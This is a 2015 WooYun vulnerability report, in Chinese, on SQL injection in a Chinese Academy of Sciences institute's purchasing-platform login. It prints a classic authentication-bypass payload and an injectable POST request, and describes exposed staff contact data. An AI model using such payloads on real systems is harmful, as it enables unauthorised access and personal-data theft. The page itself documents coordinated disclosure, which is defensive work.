当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141379

漏洞标题:中科院某研究所SQL注入泄露大量内部信息

相关厂商:中国科学院

漏洞作者: ksss

提交时间:2015-09-19 12:01

修复时间:2015-11-05 16:24

公开时间:2015-11-05 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-19: 细节已通知厂商并且等待厂商处理中
2015-09-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

我一直在思考,有大厂商的世界在哪里

详细说明:

QQ截图20150915155252.png


中国科学院上海生科院的采购平台

http://**.**.**.**/pages/login.aspx


用户登录处存在sql注入
可以构造账号,输入任意密码,绕过验证进入后台

admin' or '1'='1


QQ截图20150915190934.png


注入可以发现数据库中有大量产品和研究所人员信息

http://**.**.**.**/pages/Login.aspx
POST:__VIEWSTATE=%2FwEPDwUJNzk2NDQ4Njc0D2QWAgIBD2QWBgIBD2QWBAIBDw8WAh4EVGV4dAUH5oKo5aW9IWRkAgIPFgIfAAWhFDxkaXYgY2xhc3M9Im5vdGljZSI%2BIDx1bCBpZD0ibm90aWNldWxsaXN0IiBjbGFzcz0ibm90aWNUaXBUeHQiPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTQyMiIgdGFyZ2V0PSJfYmxhbmsiPjxmb250IGNvbG9yPXJlZD7ph4fotK3pg6jorqLotKfns7vnu5%2Fkuqflk4Hmn6Xor6Lor7TmmI7vvIgyMDEz5bm0NuaciOabtOaWsO%2B8iTwvYT48L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTAiIHRhcmdldD0iX2JsYW5rIj7liafmr5Llk4Hop6PnpoHmuIXljZXigJTigJTph4fotK3pg6g8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDQiIHRhcmdldD0iX2JsYW5rIj7ph4fotK3pg6jnu5PnrpfpgJrnn6U8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDEiIHRhcmdldD0iX2JsYW5rIj7ph4fotK3pg6jlnLDlnYDlj5jmm7TpgJrnn6U8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MjEiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMzktTkVCICjmiKrmraLoh7MxMuaciDMx5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUyMCIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszOC1wcm9tZWdhICjmiKrmraLoh7MxMuaciDMx5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxOCIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszNi1FcHBlbmRvcmYgKOaIquatouiHsznmnIgzMOaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTciIHRhcmdldD0iX2JsYW5rIj4yMDE15bm055Sf56eR6Zmi6YeH6LSt6YOo56ys5LiJ5a2j5bqm6ZuG5Lit6YeH6LStLUludml0cm9nZW4o5oiq5q2i6IezOOaciDE05pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxNiIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszNS1HZW5ldGV4ICjmiKrmraLoh7M55pyIMzDml6UpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ik5ld3NEZXRhaWwuYXNweD9OZXdzSUQ9NTE1IiB0YXJnZXQ9Il9ibGFuayI%2BMjAxNOW5tOeUn%2BenkemZoumHh%2Bi0remDqOezu%2BWIl%2BS%2Fg%2BmUgOa0u%2BWKqOS5izM0LUVOWk8gKOaIquatouiHsznmnIgzMOaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTQiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMzMtQWN0aXZlIE1vdGlmKOaIquatouiHsznmnIgzMOaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTMiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMzItYWJjYW0o5oiq5q2i6IezOeaciDMw5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxMiIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszMi1hYmNhbTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxMSIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszMS1ORUIo5oiq5q2i6IezN%2BaciDMx5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUwOSIgdGFyZ2V0PSJfYmxhbmsiPjIwMTXlubTnlJ%2Fnp5HpmaLph4fotK3pg6jkuIrljYrlubTluqbpm4bkuK3ph4fotK0tcWlhZ2VuKOaIquatouiHszXmnIgyMeaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDgiIHRhcmdldD0iX2JsYW5rIj4yMDE15bm055Sf56eR6Zmi6YeH6LSt6YOo56ys5LqM5a2j5bqm6ZuG5Lit6YeH6LStLUludml0cm9nZW4o5oiq5q2i6IezNeaciDE05pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUwNyIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszMC1taWxsaXBvcmU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDYiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMjktaW52aXRyb2dlbjwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUwNSIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYsyOC1iaW8tcmFkKOaIquatouiHszIwMTXlubQ25pyIMzDml6UpPC9hPjwvbGk%2BPC91bD48L2Rpdj5kAgMPDxYCHwAFMuaXoOatpOeUqOaIt%2B%2B8jOivt%2BmHjeaWsOeZu%2BmZhizmiJbogIXlr4bnoIHplJnor68hZGQCDw88KwALAGRkvPLcwW1BkUKd4NxaJZPKhk4rwvY%3D&__EVENTVALIDATION=%2FwEWBQKBzM2kBwLyj%2FOQAgK3jsrkBAKC3IeGDAKGxZ2yD008FUB2VuYlTbDk%2BiWK63W8oW2m&tbUserName=admin&tbPassword=123&btnLogin=%E7%99%BB%E5%BD%95


参数tbUserName

QQ图片20150915191425.jpg


百万产品信息,还有研究所人员姓名邮箱电话办公室等等信息

QQ截图20150915191713.png


漏洞证明:

QQ图片20150915191425.jpg

QQ截图20150915191713.png

修复方案:

过滤

版权声明:转载请注明来源 ksss@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-21 16:23

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国科学院计算机网络管理中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无